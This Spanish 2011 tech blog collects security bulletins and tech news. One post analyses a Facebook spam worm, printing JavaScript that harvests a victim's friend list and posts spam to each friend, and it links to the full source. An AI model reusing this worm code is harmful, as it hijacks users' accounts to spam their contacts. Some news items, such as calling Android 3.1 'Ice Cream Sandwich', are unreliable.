martes, 31 de mayo de 2011

Malware para Mac. Vamos a contar mentiras (II)

Con la excusa de la reciente aparición de rogueware para Mac (algo relativamente novedoso) vamos a intentar aclarar algunos mitos con respecto al mundo del malware para Mac donde, según percibimos, campa la imprecisión, medias verdades y mitos marquetoides. Esto afecta a usuarios, casas antivirus e incluso la propia Apple.

En la anterior entrega dábamos algunos datos sobre malware para Mac y las proporciones con respecto a otros sistemas operativos. El riesgo existe, pero si no se percibe el peligro del malware en Mac y se perpetúan estos mitos es, a su vez, por varias razones.

Apple se encarga (y le interesa) que continúe así. Numerosas campañas publicitarias nada rigurosas lo demuestran. Por ejemplo, confunde al potencial cliente afirmando que, gracias a su sistema, quedará "inmune a los virus del PC". Ese "del PC" con la que termina la frase, es una afirmación que a veces es omitida por los usuarios. Y aunque fuese cierta (que no lo es, solo habría que programar en Java, entre otras posibilidades), está realizada con poco rigor técnico. La página oficial muestra mensajes como "El Mac es invulnerable a los miles de virus que amenazan a los ordenadores con Windows gracias a las defensas integradas de Mac OS X". No son miles, sino millones. Y no es gracias a las defensas, sino a una arquitectura diferente. A tenor de los datos expuestos en el boletín anterior (sobre la base de datos de VirusTotal y las muestras recogidas en los últimos 30 días):

* Malware Android: 117 muestras únicas.
* Malware Symbian: 54 muestras únicas.
* Malware para iPhone: una única muestra.

Sería como si Nokia promocionase sus terminales afirmando que Symbian es "inmune a los cientos de virus que amenazan a los terminales con Android, gracias a sus defensas integradas". Una propuesta publicitaria más honesta, describiría las características técnicas de Mac OS X para luchar contra su propio malware, no contra el de plataformas con las que no es compatible ni comparable.

Por otro lado, a muchas casas antivirus que quieren conquistar la cuota de mercado de Apple les interesa inducir "miedo" en el usuario. Esto puede percibirse como una exageración u oportunismo y, por tanto, como una falsa alarma a la que no es necesaria prestar atención. En realidad sí existe peligro, y no hay que desdeñar la opinión de las casas antivirus, aunque tengan intereses comerciales en el asunto. Como siempre, se deben observar sus apreciaciones con criterio y perspectiva.

Por último, el perfil típico de usuario de Apple tiende a "proteger" la marca. Esto puede llevarle a no ser objetivo, y "querer creer" en ciertas afirmaciones para mantener un status que suponen inquebrantable. Es uno de los mayores logros comerciales de Apple: la creación de una imagen de marca, de un "estilo" que hace que los usuarios se influyan mucho entre sí y confíen ciegamente en el producto.

En definitiva, la eterna pregunta es: ¿podemos esperar que la industria del malware tenga como objetivo mayoritario Mac OS en un futuro próximo? Es posible, pero no demasiado probable. Se lleva años hablando de lo mismo. En 2007 se vivió un repunte del malware para Mac, que no ha prosperado hasta estas fechas en que parece que vuelve a despuntar tímidamente. Una teoría es que lo único que mantiene a Mac OS fuera del circuito del malware masivo es su cuota de mercado. Otra es que las características técnicas de Mac impiden que sufra un ataque masivo como el de Windows. Pero esto no es cierto.

Si nos detenemos en los aspectos técnicos, Windows contiene cada vez más características positivas de Mac OS y Apple está cometiendo cada vez con mayor frecuencia errores que Microsoft tiene superados. Por ejemplo, la gestión de seguridad global en Microsoft (desde la programación al parcheo) se ha ido perfeccionando con el tiempo mientras que la de Apple parece que no levanta cabeza (ya dijimos en la entrega anterior que Apple, en número, sufre ya más vulnerabilidades que Microsoft).

Otro ejemplo técnico en el que cada vez se parece más, es el hecho de usar el sistema con privilegios limitados. Es una de las mejoras defensas contra el malware. Mac OS tuvo la precaución de obligar al usuario a no ser root en el sistema por defecto. Esta medida la ha adoptado Windows sólo desde Vista. Por tanto, en este sentido Windows siempre fue un objetivo sencillo. Ahora que ambos limitan los permisos del usuario por defecto, los creadores de malware se enfrentan en igualdad de condiciones a los dos sistemas operativos. Además, ciertas variantes de rogueware, que en los últimos tiempos se ha mostrado muy lucrativo, ni siquiera depende de este tipo de restricciones.

Otra ventaja para los creadores de malware es que Mac OS es un sistema relativamente homogéneo (una configuración parecida en todas sus variantes). Esto facilita la labor de programar malware que funcione correctamente en todas las versiones, como siempre ha ocurrido en Windows, donde la homogeneidad es total.

Hablaremos en una próxima entrega de ejemplos de malware concreto que ha aparecido para Mac OS en los últimos días.

Más Información:

El Mac está basado en el sistema operativo más avanzado del mundo
http://www.apple.com/es/why-mac/better-os/

Malware para Mac. Vamos a contar mentiras (I)
http://www.hispasec.com/unaaldia/4599

Fuente: Hispasec

lunes, 30 de mayo de 2011

Malware para Mac. Vamos a contar mentiras (I)

Fuente: Hispasec 
Con la excusa de la reciente aparición de rogueware para Mac (algo relativamente novedoso) vamos a intentar aclarar algunos mitos con respecto al mundo del malware para Mac donde, según percibimos, campa la imprecisión, medias verdades y mitos marquetoides. Esto afecta a usuarios, casas antivirus e incluso la propia Apple.

Aunque parezca ridículo, hay quien niega que exista malware para Mac. Incluso, quien sostiene que en Apple hacen sistemas operativos inmunes. Si bien no merece la pena desmentir este evidente bulo, sí que sería necesario aclarar un par de puntos.

Existe malware para Mac. Es una evidencia. No en las cantidades que podemos encontrar para Windows, que juega en otra liga, pero (en el último mes) los números son comparables a los que podemos encontrar para el resto de sistemas operativos. O sea, "ahí fuera" y no en laboratorios (donde se han creado pruebas de concepto para todos los sistemas operativos) existe malware creado específicamente para Mac OS del que se lucran los atacantes.

Consultando a la base de datos de VirusTotal de los últimos 30 días (y entendiendo estos datos siempre con cierta cautela) realizaríamos la siguiente clasificación:

* Malware para Windows: 1.480.971 muestras únicas.
* Malware para Mac OS: 298 muestras únicas.
* Malware para Linux: 219 muestras únicas.
* Malware Android: 117 muestras únicas.
* Malware Symbian: 54 muestras únicas.
* Malware para iPhone: una única muestra.

Estos son muestras únicas llegadas a VirusTotal en el último mes y detectadas por más de cinco motores antivirus por firmas. Hay que tener en cuenta muchos factores como por ejemplo que las firmas para sistemas diferentes a Windows no están tan entrenadas en todos los motores, pero da una buena idea de la diferencia de órdenes de magnitud. Por ejemplo, si Windows cuenta ahora mismo con un 88% de cuota de mercado y Mac OS con un 5%, la cantidad de malware único no se ajusta en absoluto a esa proporción. El malware para Mac representa un 0,02% de las muestras únicas recibidas. En otros términos, por cada 5.000 muestras únicas de malware recibidas para Windows, se recibe sólo una destinada a Mac. Como dato adicional, la mayoría de esas casi 300 muestras son variantes de MacDefender, que se ha propagado con fuerza en los últimos días. Quizás en otros momentos los datos varíen.

El sistema móvil para el que se crea más malware es Android, con diferencia con respecto a iOS. Aquí es curioso como iOS de iPhone e iPad, siendo mucho más utilizado que Android (2,24% frente al 0,66% de uso), está por detrás en cuestión de malware. La razón es sencilla: iOS es un sistema "cerrado" donde todo el software es firmado y las descargas más o menos verificadas. Esto le libra del malware "masivo", aunque por ello pierde "flexibilidad" para el usuario. Sin embargo, tras años en el mercado, siguen existiendo vulnerabilidades en iOS para eludir su "cierre" y realizar un "jailbreak". Con cada nueva versión, intentan cerrar una puerta... pero siempre existen. Estos fallos los podría aprovechar el malware.

Ningún sistema operativo es inmune. Olvidamos que un troyano es un programa como otro cualquiera y sólo la voluntad de programarlo es lo que le separa de que se haga realidad. Lo único que diferencia al malware de cualquier otro software es que intenta instalarse silenciosamente en el equipo bien a través de la ingeniería social (engañando al usuario) bien a través del aprovechamiento de vulnerabilidades. Si hablamos de vulnerabilidades, Apple es un "experto". En 2010 Oracle y Apple superaron en número de fallos de seguridad a Microsoft. Este año Adobe también está escalando puestos. No se puede crear un programa o sistema operativo inmune a nada. Y aunque fuese posible, los atacantes aprovecharían el desconocimiento del usuario para que él mismo instalara el malware. Por tanto, no hay "escapatoria".

Continuaremos en una próxima entrega.

Más Información:

Secunia: Apple software has the most holes
http://news.cnet.com/8301-13846_3-20011403-62.html

 

Consiguen romper CAPTCHAS de audio con un 89% de tasa de acierto

Investigadores de la Universidad de Stanford, Tulane y el INRIA han descubierto la manera de obtener un alto porcentaje de acierto al intentar averiguar el contenido de los CAPTCHA auditivos.

Los CAPTCHA, acrónimo de "Completely Automated Public Turing Test to Tell Computers and Humans Apart" (Prueba de Turing pública y automática para diferenciar máquinas y humanos), son pruebas destinadas a identificar si quien está accediendo a un contenido es una persona o por el contrario una máquina que potencialmente pueda automatizar cualquier tarea sobre dicho contenido. Estas pruebas que usualmente constan de un texto que ha sido distorsionado, están empezando a utilizar el formato de audio con ruido de fondo que pueda confundir a la máquina que intente averiguar su contenido. Esto es así porque el CAPTCHA tradicional comienza a no ser suficiente, y existen técnicas para romperlo.

Los investigadores han conseguido diseñar una herramienta capaz de eliminar el ruido de fondo presente en las pistas de audio cuando los sonidos a interpretar no se reproducen de manera continua, lo que lo hace más fácil de tratar que incluso los CAPTCHAs visuales según se afirma en el documento. Esta herramienta, que han llamado Decaptcha, tiene un funcionamiento que recuerda a otras herramientas destinadas a romper los CAPTCHAs basados en texto, puesto que en un primer procesamiento se separa el audio según la energía que sea detectada en cada momento en la onda. Acto seguido se genera una representación de los dígitos extraídos y, finalmente, estas representaciones pasan por una fase de clasificación para reconocer los dígitos. A pesar de las variaciones entre los diferentes sistemas de cada compañía (velocidad de la pronunciación, tiempo entre un dígito y otro, ruido de fondo...) siempre se mantienen los mismos patrones que no pueden ser completamente enmascarados.

Las pruebas realizadas muestran el mayor éxito en los CAPTCHAs de la web de Authorize.net (89% de acierto) y unos resultados no menos reseñables del 82% con el CAPTCHA de eBay y un 49% con el de Microsoft, llegando a obtener un nivel de acierto mayor incluso que los humanos. Estos valores son conseguidos con un entrenamiento de la herramienta utilizando apenas 300 CAPTCHAs ya solucionados y en 20 minutos, llegando a resolver de manera correcta diez CAPTHCHAs en un solo minuto de procesamiento con un simple ordenador de escritorio.

Según se afirma en el artículo publicado, actualmente todos los CAPTCHA auditivos diseñados utilizando los métodos actuales (sin ruido semántico) son inherentemente inseguros si se desea que puedan ser reconocidos por el oído humano.



Más infromación:

The Failure of Noise-Based Non-Continuous Audio Captchas
http://cdn.ly.tl/publications/decaptcha-audio.pdf

miércoles, 25 de mayo de 2011

Vulnerabilidad de Cross-Site Scripting en IBM WebSphere Portal

Se ha anunciado una vulnerabilidad en IBM WebSphere Portal, que podría permitir a usuarios maliciosos construir ataques de cross-site scripting.

El problema reside en el centro de búsqueda ("Search Center") debido a que no trata adecuadamente las entradas antes de ofrecer los resultados al usuario. Esto podría permitir a un atacante lograr la ejecución de código script arbitrario en el navegador del usuario, en el contexto del sitio afectado.

IBM ha confirmado la vulnerabilidad en IBM WebSphere Portal versión 7.0.0.1 sobre AIX, IBM i, Linux, Solaris, Windows y z/OS. Se ha publicado la actualización CF004 disponible desde http://www.ibm.com/support/docview.wss?uid=swg24029452
Esta actualización además corrige un gran número de problemas relacionados con la funcionalidad del producto.

Más Información:

Fixes integrated in WebSphere Portal V7.0.0.1 Combined Cumulative Fixes
http://www.ibm.com/support/docview.wss?uid=swg24029452

sábado, 14 de mayo de 2011

Envenenamiento de resultados en Google Imágenes

Según ha informado el SANS desde hace varias semanas se están recibiendo informes relacionados con el buscador de imágenes de Google. Ofrece resultados que terminan redirigiendo a páginas de falsos antivirus. Nada nuevo, pero que está siendo especialmente insidioso y elaborado en estos días.

La infraestructura necesaria para llevar acabo esta campaña está haciendo uso de páginas webs comprometidas para alojar el contenido que se encargará del envenenamiento de los resultados. Las páginas atacadas son principalmente las que utilizan Wordpress vulnerables. En ellos suben scripts que se encargan de generar de manera automática un contenido artificial (simulado, inútil) que hará que los usuarios del buscador sean llevados a las páginas fraudulentas. Estas páginas constan de dos partes principales: la que es indexada por Google Imágenes y la que se encarga de redirigir finalmente a la víctima a otra página web con el contenido fraudulento.

El contenido que será indexado por el buscador de imágenes es creado en base a los términos más buscados en Google Imágenes, para así asegurarse que pueda llegar a la mayor cantidad de personas posible. Para ello hace uso de una herramienta de la misma compañía del buscador, Google Trends. Por ejemplo, se crea contenido artificial sobre Bin Laden, si se detecta que es de los términos más buscados en el momento. Además, también se encargan de buscar imágenes relacionadas con los términos adecuados (fotografías del personaje, por ejemplo), apareciendo así en la lista de resultados del buscador de imágenes.

Los atacantes comprueban en esas páginas (a través de la IP o el UserAgent) si lo que les visita es un bot de Google (los encargados de indexar páginas web para incluirlas en el buscador) y se encargan de ofrecer el contenido preciso que les llevará a aparecer arriba en las búsquedas.

El resto del contenido de la página es el que se encarga de redireccionar a los usuarios del buscador hacia páginas fraudulentas cuando son visitadas. Google Imágenes ofrece resultados afines a la consulta realizada mostrando una lista de miniaturas de los resultados. Tras pulsar sobre una miniatura perteneciente a uno de estos sitios comprometidos, Google lleva al usuario a la página que aprovecha el fallo. Se trata de la conocida página con la miniatura de la imagen seleccionada en el centro, los enlaces a la imagen y, de fondo, la página final que contiene la fotografía. Ahora es cuando el navegador, al realizar la petición de la página que formará parte del fondo y que está comprometida, ejecuta el script que ha sido incrustado en la página atacada (aunque no esté siendo visitada "del todo"). Es el propio script el que ha comprobado previamente, mediante el campo 'Referer' de la petición, que ésta proviene de la página de búsqueda de imágenes de Google. En ese momento redirige a la víctima a otras páginas fraudulentas, que, en esta última oleada contienen falsos antivirus (rogue). Por tanto, el usuario no debe ni siquiera visitar completamente la página comprometida, solo ver alguna fotografía en Google Imágenes a la que ha sido vinculada.

Google está tomando medidas con respecto a esta técnica, eliminándolo los enlaces o informando del peligro de acceder a los mismos. Sin embargo, la cantidad de este tipo de resultados en el buscador es demasiado grande como para poder decir que el asunto se encuentra bajo control (medio millón de visitas cada día según estimaciones del investigador Denis Sinegubko, un reputado investigador de rogueware).

Desde el SANS indican que una de las mejores opciones para protegerse es evitar la ejecución de código JavaScript de páginas en las que no se confíe, a través de, por ejemplo, complementos como 'NoScript' disponible para Mozilla Firefox o las zonas de Internet Explorer.

Más Información:

More on Google image poisoning
http://isc.sans.edu/diary/More+on+Google+image+poisoning/10822

Scammers Swap Google Images for Malware
http://krebsonsecurity.com/2011/05/scammers-swap-google-images-for-malware/

jueves, 12 de mayo de 2011

Enviar Spamm a travéz de Facebook - ==>[VERIFY MY ACCOUNT]<==



Para terminar el ciclo de post del día de hoy, analizamos el código fuente del script que fué capaz de enviar miles de post no solicitados a travez de la famosa red social Facebook.

Codigo fuente del Script Spammer ( https://docs.google.com/document/d/1A4uxqtjr-nYoL3NNwE_wklrJPn67napJEBDWk2gsYno/edit?hl=es&authkey=CLuVkYoH ).

Bueno, el ataque consta de tres etapas principales:

1. Desarrollo del script worm (no, creo que éste sea su nombre correcto) donde se obtiene por GET el listado de amigos del usuario infectado, con una simple linea. gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);

Además, se inicia un ciclo donde por medio de ajax de Facebook se envia por POST el mensaje de Spam.

var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;

2. Creación e infección del primer usuario. Para lograr esto, los autores necesitaron una aplicación de Facebook o bien, utilizar el API de Facebook (Celulares) para el envío de los primeros POST con algun recortador de urls.

3. Difundir mensajes y comenzar a ganar dinero con publicidad.

Al parecer, en los primeros análisis el origen del error viene de las validaciones en aplicaciones para móviles.

Saludos!

De ultimo minuto, los monitores de Facebook han banneado las primeras URLS de los servidores donde se hospeda el fuente js, sin embargo, si no filtran los post los ataques seguirán. Este fue un ejemplo de Cross Site Scripting XSS bien hecho, saludos!

Ing Cruz. http://alfonsocruz.blogspot.com

miércoles, 11 de mayo de 2011

Google vende laps



Dicho y hecho, la empresa Google ahora quiere entrarle a la venta de computadoras portátiles, el motivo es dar difusión a sus servicios Google Docs, Google Calendar, Gmail, Picasa, Google Hearth y demás.

Te las venderan sin disco duro o las rentarán para universidades, se supone que tendrán muy bajo costo. Pero para los usuarios tradicionales, tendrán que darles una solución para su MSN, Media Player y facebook... Bueno, su argumento es que todo se encuentra en internet, y por lo tanto ya no necesitan disco duro como antes, ya que desde que encientes el equipo (8 segundos) se carga tu perfil de google y empieza a funcionar el sistema.

Articulo completo:

(CNNExpansión.com) — Google presentó este miércoles sus nuevas computadoras ‘Chromebooks', una versión ligera y sin disco duro de una ‘laptop', que se conecta a Internet para ejecutar sus aplicaciones.


Estos dispositivos estarán disponibles a partir del 15 de junio en seis países: Estados Unidos, Francia, España, Italia, Alemania y Reino Unido. Su precio fluctuará entre 349 y 499 dólares y se podrán adquirir en tiendas Best Buy y a través de Amazon.com.

Las nuevas computadoras son una incursión de Google en un territorio dominado durante años por Microsoft y Apple.

"Queremos llevar realmente tu vida hacia la web, sin programas, sin aplicaciones (...) todo vive en Internet", dijo Vic Gundotra, vicepresidente de la división social de Google, durante la conferencia de la empresa para desarrolladores, realizada en San Francisco.

Estos equipos, fabricados por Samsung y Acer, encienden en tan sólo ocho segundos, tienen una batería con una duración de más de 14 horas y se conectan automáticamente con tu perfil de Google. Además, poseen conexión inalámbrica Wi-Fi y también se ofrecerán con tecnología 3G, disponible con operadoras como Verizon o Telefónica.

"Podrás ejecutar Google Docs, Google Calendar, GMail, Picasa y todas tus aplicaciones que ya utilizas, sin la necesidad de tener un disco duro", agregó Gundotra.

El directivo agregó que también se ofrecerán ediciones especiales para escuelas y organizaciones no gubernamentales, bajo un esquema de renta mensual de 28 dólares.

Un fallo de Facebook permitió la filtración de datos de usuarios a terceros


Los Ángeles (EEUU), 10 may (EFE).- Un fallo en los sistemas de Facebook permitió durante años que anunciantes y empresas asociadas a aplicaciones para la red social tuvieran acceso a información privada de los usuarios de la plataforma, según informó hoy la empresa de seguridad Symantec.

Un estudio realizado por esa compañía detectó que en algunos casos el software que instalaba el usuario en su Facebook para jugar, hacer compras u otras gestiones ofrecía a anunciantes y terceras empresas una puerta de entrada secundaria a la cuenta personal.

Ese vía alternativa de acceso se creó para garantizar un acceso de repuesto a la aplicación en caso de que el principal fallara.

Symantec calificó el problema en Facebook como de "accidental" y comunicó su hallazgo a la red social que confirmó hoy que ya había puesto remedio a ese posible punto de fuga de datos.

Facebook realizó una investigación al respecto y aseguró que "no existen evidencias" de que se produjeran filtraciones de información privada y es posible que tanto anunciantes como otras empresas con acceso no supieran de la existencia de esa entrada oculta a las cuentas de los usuarios.

En abril, Symantec consideró que aproximadamente 100.000 aplicaciones podrían haberse visto afectadas en Facebook, aunque la cifra podría ascender a millones desde que la red social abrió su sistema a software de terceros.

Otro informe conocido hoy elaborado por Consumer Reports indicó que al menos 7,5 millones de usuarios de Facebook tienen menos de 13 años, edad mínima requerida por la plataforma y que 5 millones no han cumplido 10 años.

Ese estudio mostró que existe un gran desconocimiento de los padres sobre el uso que hacen los menores de esa red social, que quedan expuestos "a software malicioso o amenazas serias como abusadores infantiles". EFE

Google prefiere cancelar el servicio de Street View

Así es, es Suiza las autoridades podrían obligar legalmente a la compañía para que ofrezca las garantías de anonimato a sus usuarios, sin embargo Google preferiría cerrar el servicio en vez de garantizar esos derechos.


Google continúa luchando con las autoridades de distintos países en el mundo (Europa sobre todo) para que Street View deje de ser un servicio tan polémico. No obstante, la compañía podría estar a punto de tirar la toalla en Suiza, país en el que se plantean cerrar Street View.

La razón es que la corte suprema suiza podría estar a punto de dictar sentencia obligando a Google a dar a la gente fotografiada en Street View “garantía absoluta de anonimato”, algo que la compañía no quiere acatar. De hecho, el jefe de Google en Suiza, Patrick Warnking, ha asegurado que pedirán al Tribunal Federal de Suiza anular la decisión de la corte.

No obstante, si finalmente la apelación no funciona y Google responde llevando a cabo sus amenazas, será la primera vez que Street View es cerrado (por parte de Google) en un país entero. Aunque Warnking ya ha asegurado que su prioridad es mantener el servicio en el país.

“Haremos todo lo posible para preservar Street View para los usuarios suizos”, aseguró Warnking, que indicó que ya están “tomando medidas para proteger la identidad de los individuos y vehículos en Street View”, según recoge LA Times. Habrá que ver si esto es suficiente para las autoridades suizas o, por el contrario, Google decide irse.

Akonadi Control Process not registered at D-Bus


Hola a todos, espero que hayan pasado un excelente 10 de mayo.

El tema del día de hoy, es cómo resolver éste error que se me presentó durante bastante tiempo y no le di importancia porque no utilizaba muchas de las aplicaciones de KDE.

Pero bueno, aqui les muestro una captura de pantalla del problema.

Al iniciar Slackware 13.1 arrancaban también diversas aplicaciones de kde, sin embargo se moestraba este error:

Akonadi Control Process not registered at D-Bus

Y para poder corregirlo, basta con hacer lo siguiente:


Agrega la linea

"user=root" en el archivo de configuración local mysql de Akonadi (por ejemplo, esta /root/.local/share/akonadi//mysql.conf), y el servidor de Akonadi puede iniciar perfectamente.

Espero que les haya servido, saludos!

martes, 10 de mayo de 2011

Facebook pagará a sus usuarios por ver algunos anuncios



Facebook ha lanzado un nuevo sistema de compensación que permite a los usuarios que vean ciertos anuncios en la red social beneficiarse con Créditos de Facebook, que pueden ser canjeados para comprar bienes en ofertas de ‘Facebook Deals’, al estilo Groupon, o alquilar películas en la red social.

El incentivo, de momento, no es muy alto; Facebook concede un crédito por hacer ‘click’ en un anuncio. Cada crédito es el equivalente de 10 centavos de dólar (0,07 euros).

Según informa Mashable, los anuncios en su mayoría estarán en los juegos. CrowdStar, Digital Chocolate y Zynga se encuentran entre los editores de juegos participantes.

Facebook quiere ampliar el servicio y está trabajando con Sharethrough, SocialVibe, los medios de comunicación Epic y SupersonicAds para publicar anuncios en el programa, así como TrialPay, que proporcionará análisis.

El CEO de Sharethrough, Dan Greenberg, en declaraciones recogidas por Mashable dice que este movimiento Facebook se encuentra "a un paso de la publicidad interruptiva". Greenberg, cuyos clientes incluyen a Microsoft y Nestlé, dice que su red "no mostrará su publicidad de forma tradicional simplemente, sino más bien lo mostrará como entretenimiento de marca, que los consumidores querrán no sólo ver, sino compartir con sus amigos".

En un principio sólo se podían canjear estos créditos por contenidos propios de la red social pero teniendo en cuenta que Facebook cada vez ofrece más servicios y contenidos, las posibilidades son ilimitadas.

El objetivo de este nuevo tipo de publicidad recompensada es ayudar a los desarrolladores de juegos a rentabilizar sus aplicaciones por medio de la publicidad y, de paso, popularizar el uso de Facebook Credits.

Vía:

- Mashable (http://mashable.com/2011/05/06/facebookfacebook-10-cents-ads/).

- Inside Facebook (http://www.insidefacebook.com/2011/05/05/trialpay-dealspot-credits-videos/)

Auriculares de Pioneer contra el agua



Pioneer ha lanzado sus primeros auriculares resistentes al agua, ideales para los que disfrutan de la música mientras practican su deporte favorito. Los SE-CL331 se pueden lavar cómodamente para eliminar cualquier rastro de sudor o suciedad y mantener una higiene óptima, además de poderse usar al aire libre en días de lluvia.

Para garantizar un perfecto ajuste, también cuentan con un novedoso sistema de enganche ergonómico que evita que se muevan durante la práctica de actividades deportivas. El modelo ya ha llegado al mercado español y está disponible en tres colores: blanco, azul y rosa.

Los SE-CL331 cumplen con la normativa internacional IPX5 e IPX7, que los acredita como sumergibles en el agua hasta 1 metro de profundidad. La resistencia al agua se consigue gracias a un filtro especial, compuesto de una malla de doble capa y un anillo de goma.

Estos auriculares son especialmente recomendables para los amantes del deporte, ya que cuentan con un innovador soporte que se ajusta al oído manteniéndolos firmemente sujetos. Además, vienen con 4 pares de tapones ergonómicos de distintas tallas para que cada usuario utilice los que mejor se adapten a su oído, garantizando así un ajuste cómodo y seguro.

El cable en forma de Y mide 1,2 m de longitud para evitar interferencias e incluye un gancho para que no se tense el cable, de forma que aumenta la estabilidad, impide que los auriculares se caigan y elimina el ruido provocado por el roce del cable con la ropa. Los SE-CL331 también incluyen una pequeña funda para protegerlos durante el transporte.

En cuanto a sus prestaciones de audio, han sido diseñados para ofrecer una reproducción óptima de cualquier género musical, aportando un sonido de alta claridad combinado con unos graves potentes. Incorporan unos drivers de 9 mm que proporcionan una respuesta de frecuencia de 10 a 20.000 Hz, con una impedancia de 16 Ω. Además, un mini-conector estéreo dorado de 3,5 mm y un cable OFC (cable libre de oxígeno) plateado, aseguran un buen contacto eléctrico y una excelente transmisión del audio.

Los auriculares lavables de Pioneer SE-CL331 estarán disponibles en mayo de 2011 a un precio aproximado de $500.00.

Los usuarios de redes sociales tienen el doble de amigos que en la vida real



Las redes sociales son un instrumento que se ha incorporado a nuestra forma de relacionarnos de forma natural.



La facilidad para interaccionar con las personas y la sencillez que otorgan estos sitios para agregar gente consiguen que tengamos seamos más sociables online que fuera del mundo virtual.

Una persona normal tiene el doble de amigos en el ciberespacio que en la realidad, según una investigación encargada por la fundación dedicada a combatir la fibrosis quística en Reino Unido Cystic Fibrosis Trust. Este trabajo detalla que los usuarios de estos sitios tienen 121 amigos de media en línea en comparación con los 55 que tienen en la vida real.

El estudio, recogido por The Guardian, también afirma que las personas tienden a ser "más abiertas, confiadas y sinceras" con sus amigos virtuales que con los reales. En este sentido, el estudio de la asociación pone sobre la mesa las ventajas de este tipo de redes para mejorar la comunicación y la vida social de personas con alguna enfermedad que ven limitado su movimiento.

"Para la mayoría de las personas, Internet es una manera de mantenerse en contacto con sus seres queridos y amigos, pero para las personas que están aisladas debido a una enfermedad, las redes sociales desempeñan un papel vital ya que, a menudo, pueden actuar como un salvavidas", según la asesora clínico psicológica del Centro de Adultos de Cystic Fibrosis Trust, Helen Oxley, en el hospital Wythenshawe de Manchester.

Según ha explicado Oxley al medio británico, en la sociedad en general, las formas en que las amistades se forman y se nutren "están cambiando a la gente", que reconoce que se pueden desarrollar conexiones "profundas y significativas" con otras personas que nunca han conocido, y puede que nunca se encuentren.

Por otra parte, los resultados del estudio revelan que una de cada 10 personas se ha reunido ya con su mejor amigo en línea o creen que van a reencontrarse con amigos de toda la vida en la web.

LA RED SOCIAL COMO TELÉFONO MÓVIL.

Los resultados ponen de relieve cómo la interacción entre personas en la sociedad también está cambiando. Sólo el cinco por ciento pediría el número de teléfono de alguien y el 23 por ciento son más propensos a pedir una dirección de correo electrónico o un nombre completo con la intención de añadir a una red social.

De acuerdo con la Fundación de Fibrosis Quística, Internet es una herramienta "vital" para las personas con incapacidades ya que les permite relacionarse socialmente tanto como lo harían físicamente. El director ejecutivo de la Fundación ha dicho: "El aspecto social de la web es muy importante para mucha gente con discapacidades, especialmente los que ya no son capaces de salir a la calle".

Sin embargo, un estudio ha revelado que uno de cada cinco padres piensa que los resultados escolares de sus hijos están "sufriendo" debido a la cantidad de tiempo que invierten en Facebook, Twitter, Myspace y otras páginas web no educativas.

Un cuestionario realizado a 4.427 adultos, indica que el 20 por ciento de los padres cree que la educación de sus hijos se ve "obstaculizada" por la cantidad de tiempo que pasan en estos sitios.

La encuesta, realizada por la empresa de servicios de seguridad en Internet, HomeSafe TalkTalk, ha mostrado que los niños pasan un promedio de dos horas y seis minutos online al día. Casi la mitad, niños de seis a 11 años de edad, pasan una o dos horas al día usando Internet para jugar, pero sólo el 10 por ciento utiliza Internet diariamente para hacer sus tareas.

Dicho estudio ha encontrado que el 50 por ciento de los niños de edades comprendidas entre 12 y 17 sitios utiliza redes sociales "todos los días", mientras que sólo el 16 por ciento usa Internet a diario para hacer los deberes.

El jefe ejecutivo de Childnet, Will Gardner ha dicho: "Los niños menores de 15 años nunca han conocido un mundo sin Internet. Ha revolucionado la forma en que aprenden, juegan y se comunican entre sí".

Google presenta Android 3.1



Google ha presentado la nueva versión de su sistema operativo móvil Android, Ice Cream Sandwich, la 3.1, con su logotipo correspondiente. Pretende unificar la experiencia de móviles y ‘tablets’.

La compañía Google ha presentado en la tarde del martes las novedades de su sistema operativo móvil en la conferencia para desarrolladores Google I/O en San Francisco.

Después de meses de especulaciones, Google ha enseñado su nueva creación, Android Ice Cream Sandwich. Se trata de una versión de su sistema operativo que pretende unificar todas las anteriores y acabar de una vez con la fragmentación.

La compañía ha asegurado que esta versión funcionará en ‘smartphones’ y ‘tablets’ y que se lanzará al mercado a finales de 2011. Asimismo, el sistema operativo recibirá nuevos servicios como un sistema de alquiler de películas o un reproductor en la nube de música denominado ‘Music Beta by Google’.

Asimismo, Google ha presentado la imagen de esta nueva versión. Se trata de un simpático sandwich helado con forma de androide. La compañía ha optado por los colores marrón y blanco, abandonando el verde tradicional que se asocia con su androide. Cuando presentó la versión Honeycomb adaptó su logo a la forma de una abeja y también varió los colores, utilizando el azul y el negro.

Microsoft compra Skype



Microsoft Corp. anunció este martes la compra del operador telefónico por internet Skype por 8 500 millones de dólares. Esta compra es la mayor realizada por Microsoft en sus 36 años de historia.

La adquisición de Skype le dará a Microsoft una valiosa herramienta de comunicaciones que el gigante incorporará en sus principales productos: Teléfonos Móviles Windows Phone, sistemas de mensajería y redes sociales (Windows Live, MSN y Messenger) y consolas de videojuegos Xbox 360.

Asimismo, Microsoft se ha comprometido a seguir manteniendo la presencia de Skype en otras plataformas, tanto para terminales móviles como equipos informa´ticos.

Skype el primer operador de telecomunicaciones vía Internet

La plataforma de comunicaciones vía Internet Skype fue creada en 2003 por el danés Janus Friis y el sueco Niklas Zennström. Ambos expertos programadores y que habian saltado a la fama por haber creado anteriormente el que fue uno de los programas más populares para el intercambio de ficheros P2P, Kaza. La aplicación, con un interfaz muy parecida al popular Messenger, se convirtió rápidamente en un gran éxito debido a la facilidad de su uso y la gratuidad del servicio que facilita realizar todo tipo de llamadas (desde nacionales a internacionales) a través de los equipos informáticos.

En septiembre de 2005 la empresa fue comprada por eBay por 2.600 millones de dólares. La integración de Skype con eBay fue una fuente de conflictos permanentes entre los antiguos propietarios y la compradora lo que acabó con el despido de estos últimos del gigante del comercio electrónico. Ante la imposibilidad de rentabilizar Skype y una demanda por el uso de licencias emprendida por Janus Friis y Niklas Zennström, en julio del 2009 vendió el 70% de la empresa al fondo de inversiones Silver Lake Partners en el que participaban los antiguos propietarios.

A más usuarios, más perdidas

